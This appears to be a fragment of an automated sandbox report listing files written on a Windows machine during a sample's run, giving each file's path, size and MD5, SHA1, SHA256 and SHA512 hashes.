MD58bf1c6238838300b82c9ae11daf8b083
SHA156df25c245a6ab62e25f08edb66f16e8332caabb
SHA2564fc806c4af74cb789c83dc9ebc4d80436d40eb08b308a5799d949af100e2a103
SHA512723ee3fc8e03efab9dfc729c1d6d63e6a8893a629a985cec7fbafd33271fc9f8e34dd56a66145c9bb978bda4ecf7f5302c85bba01168fbafcb421f6b37a23a74
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD581216877fea990119549457b91e2689d
SHA1f340261aff18fccfdf4040f3d08738c7a97b2e45
SHA256c1dde89e458f4ba50b4e1894837e4828256da7eb37cef157caf7b4b0bfcd2876
SHA5120ebdc7e046e74c6c2a2692ade880720cf57fbebf23419d34952ec34b9b36186bdf77e2ee24eb2ec7a5be3fb8759dfea9f967d33309a6a8c388c3a6db7ca422cf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD519206a9c7788b7ba082b8eb47c812f26
SHA19787837375deb875f32fa6d1bec84d239926e4af
SHA2568d77a64b0b0a4fbf3557067a8e527b94d282afcf626e1b0567a75ce7ca5e742f
SHA5126a9bccdade02089afa3be5173b7cd8b83014ce37b01c16ff9a6729dfef9255cccf3711e6f69027ac91738ecd5067a4f44fa1d5d829d75aadb526e0c2725deb7a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD554d0aa79f9cab89579f77569cfa4c263
SHA171fc9cacc0e471680c5059ae9aa84bb497f4610c
SHA256b7e9747e07e8e2c8edc9ae49526201cc2a4e9ec3309c2b5bac7a6317e8f2ad32
SHA512b4aa3453a5fc88b89f7dfa01e3f9ba125f58ccd9cd861cc92715d0982bd06a8dc026e39efa7ba327965dec63b67c9550ecf50cacd665d359324e1bdbce55d64e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD59fa9ea8632ef1c18faab0d00c9328e51
SHA19d898191783f8e0601ec32cd458ab942920ce146
SHA256f32ebcbf1bfd88c9e47089c82ce1ee77937f7b72f5cd76b42dc1df66a47c3972
SHA512800281c401d2f0ed73e1988b489b8fa0d175793cded69825a67757173509ea6e92c9d43d5f9fdb6706dde04a713343f2aa065b719e821f8e6871c38f22e2fb43
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD51bfc70e43e4c7b18de04a00757927fd9
SHA135b1d1ebe2f0da81e09985a7e8fa2453ab57eea0
SHA25634b7bd17e7d41540d6905a61907d910ed000843fac6245d416f1045bf065f881
SHA512ba93d86bcf2f6c5ca5dcc7e2bf29c753b1c2a9276248ec652afa18b2962f384c5d82fa52dd5f640c60636f9ee282733151926cc7bfe5e632531220830bd199cd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD52b9a2df77e152da3c35f5bd17dc839d4
SHA1febefc87a1986e913c8c5942dcf516373a9f0844
SHA256b6c3cd8f12850305a79516f9acf267ec8259668a1d91f13e809342394ede87ba
SHA5121a08273ea6b9a0b660da0ef375e23a91b614bbf1c9e25d6c7c4f974fa7f900d13617fcad28a247739bcd50eacc4bbe7fea70292bd3cd8c8c1b43f1d4df650574
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5313b5d6fe283170647aaaae9022367d7
SHA1cab69505a73a592127f260b2bce74b569226758e
SHA256e6f10d9b7621baa5de1a006bb3468dd3f1b6f68b3240a8396645305195fa8949
SHA512196be2d5a37c4da1d268e7dd5c1eed016535f0f3e168d29c5b692586bb3c81f87e0ac94723a37179a227cf1c5580f737ef74027973ec3658b193477ab82ce5fd
-
Filesize
1KB
MD545a66afa3b07b3143f0d0c3515898bae
SHA1cc5baf0c4d2fc0b034974786f20087e058915693
SHA2568a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6
SHA51204aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ec7fd46e4306fb1ce0941f48a06c266d
SHA10f1005b6c5a62f5f341710ff04c5ff73d9b9f898
SHA2568f666442a7f7a2042663a51bbee2b8e5c42919890a190eea6e56d7860111eee9
SHA51214612df97dc37abdde72edfbac48a5221b8343cedb433f33069e9738026fb8db10628dece56a81b92ff4ec8e08e5f8342d24668bd0cbf73c0e56d0b9c2a50f93